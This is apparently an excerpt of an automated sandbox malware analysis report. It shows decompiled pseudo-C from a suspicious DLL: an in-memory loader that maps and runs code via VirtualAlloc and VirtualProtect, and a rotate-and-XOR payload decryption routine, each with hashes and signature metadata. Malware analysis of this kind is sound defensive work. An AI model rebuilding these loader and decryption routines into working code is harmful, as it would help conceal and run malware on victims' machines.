				void* _t66;
				void* _t68;
				signed long long _t69;
				void* _t78;
				signed int _t80;
				intOrPtr* _t89;

				_t68 = __rcx;
				_t63 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t66 = __rcx;
				r8d = 0x3000;
				_t5 = _t68 + 4; // 0x4
				r9d = _t5;
				VirtualAlloc(??, ??, ??, ??);
				_t80 = __rax;
				if (__rax != 0) goto 0x80002baa;
				GetLastError();
				goto 0x80002c72;
				_t54 =  *((intOrPtr*)(__rcx + 0x1c));
				if (_t54 <= 0) goto 0x80002bf1;
				_t69 = __rax * 0x11;
				r8d =  *(_t69 + __rcx + 0x28);
				r10d =  *((intOrPtr*)(_t69 + __rcx + 0x20));
				_t89 = __r8 + __rcx;
				r9d =  *((intOrPtr*)(_t69 + __rcx + 0x2c));
				if (_t54 == 0) goto 0x80002bea;
				if (_t89 == 0) goto 0x80002bea;
				_t56 = __r9;
				if (_t56 == 0) goto 0x80002bea;
				 *((char*)(__r10 + __rax)) =  *_t89;
				if (_t56 != 0) goto 0x80002bd8;
				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
				if (E00000001180001A3C(1 -  *((intOrPtr*)(__rcx + 0x1c)), __rax, __rcx, __rax, __rcx, __rax) != 0) goto 0x80002c07;
				goto 0x80002c72;
				if (E00000001180001E64(__rcx, __rax, __rcx, _t78, __rax, __rdx) != 0) goto 0x80002c28;
				GetLastError();
				goto 0x80002c72;
				if ( *((intOrPtr*)(_t66 + 0x1c)) <= 0) goto 0x80002c56;
				r8d =  *(_t63 * 0x11 + _t66 + 0x30) & 0x000000ff;
				VirtualProtect(??, ??, ??, ??);
				_t61 = 1 -  *((intOrPtr*)(_t66 + 0x1c));
				if (_t61 < 0) goto 0x80002c2d;
				if (_t61 == 0) goto 0x80002c72;
				 *((long long*)(_t63 + _t80))();
				_t43 = GetLastError();
				asm("bts eax, 0x1b");
				return _t43 & 0x00ffffff;
			}















                                              0x180002b5c
                                              0x180002b5c
                                              0x180002b5c
                                              0x180002b61
                                              0x180002b66
                                              0x180002b73
                                              0x180002b79
                                              0x180002b81
                                              0x180002b81
                                              0x180002b85
                                              0x180002b8d
                                              0x180002b93
                                              0x180002b95
                                              0x180002ba5
                                              0x180002bac
                                              0x180002baf
                                              0x180002bb3
                                              0x180002bb7
                                              0x180002bbc
                                              0x180002bc1
                                              0x180002bc4
                                              0x180002bcc
                                              0x180002bd1
                                              0x180002bd3
                                              0x180002bd6
                                              0x180002bde
                                              0x180002be8
                                              0x180002bef
                                              0x180002bfe
                                              0x180002c05
                                              0x180002c14
                                              0x180002c16
                                              0x180002c26
                                              0x180002c2b
                                              0x180002c38
                                              0x180002c49
                                              0x180002c51
                                              0x180002c54
                                              0x180002c5c
                                              0x180002c61
                                              0x180002c63
                                              0x180002c6e
                                              0x180002c86

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocErrorLastVirtual
                                              • String ID:
                                              • API String ID: 497505419-0
                                              • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                              • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
                                              • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                              • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00000001800014B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 30%
                                              			E000000011800014B4(unsigned long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				signed int _t18;
				unsigned long long _t40;
				signed long long _t44;
				void* _t48;
				intOrPtr* _t53;
				void* _t57;
				char* _t65;

				_t40 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t18 =  *__rdx & 0x0000ffff;
				_t57 = __rcx;
				if (_t18 == 0) goto 0x800014f1;
				 *(__rcx - __rdx + __rdx) = _t18;
				_t44 = __rbx + 1;
				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
				_t48 = __r8;
				E00000001180001604(__rax, _t44, __r8, __rcx);
				_t53 =  !=  ? _t40 : "error";
				if ( *_t53 == 0) goto 0x80001543;
				_t65 = "0123456789ABCDEF";
				 *((short*)(_t57 + _t44 * 2)) =  *((char*)((_t40 >> 4) + _t65));
				 *((short*)(_t57 + 2 + _t44 * 2)) =  *((char*)(_t48 + _t65));
				if ( *((intOrPtr*)(_t53 + 1)) != 0) goto 0x80001517;
				 *((short*)(_t57 + (_t44 + 2) * 2)) = 0;
				if (_t40 == 0) goto 0x80001560;
				GetProcessHeap();
				return HeapFree(??, ??, ??);
			}










                                              0x1800014b4
                                              0x1800014b4
                                              0x1800014b9
                                              0x1800014be
                                              0x1800014c8
                                              0x1800014cd
                                              0x1800014d5
                                              0x1800014dd
                                              0x1800014e2
                                              0x1800014ef
                                              0x1800014f1
                                              0x1800014f4
                                              0x180001506
                                              0x18000150e
                                              0x180001510
                                              0x18000152b
                                              0x180001534
                                              0x180001541
                                              0x180001543
                                              0x18000154a
                                              0x18000154c
                                              0x180001577

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID: 0123456789ABCDEF$error
                                              • API String ID: 3859560861-2801526254
                                              • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                              • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
                                              • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                              • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001604 Relevance: 6.0, APIs: 4, Instructions: 34memorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
                                              • String ID:
                                              • API String ID: 1639946962-0
                                              • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                              • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
                                              • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                              • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001760 Relevance: 5.1, APIs: 4, Instructions: 121memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocFree
                                              • String ID:
                                              • API String ID: 756756679-0
                                              • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                              • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
                                              • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                              • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180002268 Relevance: 5.1, APIs: 4, Instructions: 117memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 27%
                                              			E00000001180002268(void* __ecx, void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
				void* _v8;
				char _v872;
				signed int _v904;
				signed int _v912;
				long long _v920;
				long long _v928;
				long long _v936;
				void* __rbp;
				void* _t101;
				long long _t104;
				intOrPtr _t109;
				void* _t112;
				signed long long _t115;
				long long _t118;
				long long _t119;
				signed int _t120;
				signed long long _t121;
				long long _t124;
				intOrPtr _t125;
				void* _t128;
				void* _t131;
				void* _t132;
				signed long long _t135;

				_t115 = __rdx;
				_t101 = _t131;
				 *((long long*)(_t101 + 8)) = __rbx;
				 *((long long*)(_t101 + 0x10)) = __rsi;
				 *((long long*)(_t101 + 0x18)) = __rdi;
				 *((long long*)(_t101 + 0x20)) = __r14;
				_t132 = _t131 - 0x3c0;
				r14d =  *((intOrPtr*)(__rcx + 2));
				_t124 = __rcx + 0x2c6;
				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t124, _t101 - 0x2c8, __r8,  &_v872);
				_v912 = _v912 & 0x00000000;
				_t118 = __r14 - 0x10;
				_t112 = _t118 + _t124;
				_v936 = _t124;
				_v920 = _t118;
				_v928 = _t124;
				if (_t112 == 0) goto 0x800022e4;
				asm("movups xmm0, [ecx]");
				_t104 = _t112 - __r14 - _t124;
				asm("movups [esp+eax+0x50], xmm0");
				_t119 = _v920;
				_t125 = _v936;
				r10d = 0;
				if (_t125 == 0) goto 0x800023f3;
				if (_t119 - 4 < 0) goto 0x800023f3;
				_t120 = _t119 + 0xfffffffc;
				_v920 = _t120;
				if (_v928 != 0) goto 0x8000233e;
				if (_t120 == 0) goto 0x800023f3;
				GetProcessHeap();
				_t135 = _t120 + 1;
				HeapAlloc(_t128, ??);
				_v928 = _t104;
				if (_t104 == 0) goto 0x800023f3;
				r10d = 1;
				r9d =  *(_t120 + _t125);
				r11d = 0;
				r9d = r9d ^ _v904;
				_v912 = _t120;
				if (_t120 == 0) goto 0x800023b6;
				r8d = _t115 + 1;
				r8d = r8d & 0x00000003;
				 *(__r11 + _t104) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) +  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) ^  *(__r11 + _t125);
				asm("ror eax, cl");
				 *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) + 1;
				asm("ror eax, cl");
				 *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) + 1;
				_t109 = _v928;
				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
				goto 0x80002354;
				_t121 = _v912;
				if (_t121 == 0) goto 0x800023d0;
				asm("rol ecx, 0x3");
				if (_t115 + 1 - _t121 < 0) goto 0x800023bf;
				if (r9d == 0 + ( *(_t115 + _t109) & 0x000000ff)) goto 0x80002415;
				if (r10d == 0) goto 0x800023f3;
				if (_t109 == 0) goto 0x800023f3;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0x4000000;
			}


























                                              0x180002268
                                              0x180002268
                                              0x18000226b
                                              0x18000226f
                                              0x180002273
                                              0x180002277
                                              0x180002283
                                              0x18000228a
                                              0x180002293
                                              0x18000229a
                                              0x18000229f
                                              0x1800022a5
                                              0x1800022a9
                                              0x1800022ad
                                              0x1800022b2
                                              0x1800022ba
                                              0x1800022c2
                                              0x1800022c4
                                              0x1800022cd
                                              0x1800022d0
                                              0x1800022d5
                                              0x1800022df
                                              0x1800022e4
                                              0x1800022ea
                                              0x1800022f4
                                              0x1800022fa
                                              0x1800022fe
                                              0x180002306
                                              0x18000230b
                                              0x180002311
                                              0x18000231a
                                              0x180002321
                                              0x180002327
                                              0x180002332
                                              0x180002338
                                              0x18000233e
                                              0x180002342
                                              0x180002345
                                              0x18000234a
                                              0x180002352
                                              0x180002358
                                              0x18000235f
                                              0x180002375
                                              0x180002383
                                              0x180002387
                                              0x180002395
                                              0x180002399
                                              0x18000239e
                                              0x1800023a8
                                              0x1800023af
                                              0x1800023b1
                                              0x1800023bd
                                              0x1800023c8
                                              0x1800023ce
                                              0x1800023d3
                                              0x1800023d8
                                              0x1800023dd
                                              0x1800023df
                                              0x1800023ed
                                              0x180002414

                                              APIs
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
                                                • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32 ref: 0000000180001F79
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
                                                • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
                                                • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
                                              • GetProcessHeap.KERNEL32 ref: 0000000180002311
                                              • HeapAlloc.KERNEL32 ref: 0000000180002321
                                              • GetProcessHeap.KERNEL32 ref: 00000001800023DF
                                              • HeapFree.KERNEL32 ref: 00000001800023ED
                                                • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
                                                • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
                                              • String ID:
                                              • API String ID: 2105669568-0
                                              • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                              • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
                                              • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                              • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
                                              Uniqueness

                                              Uniqueness Score: -1.00%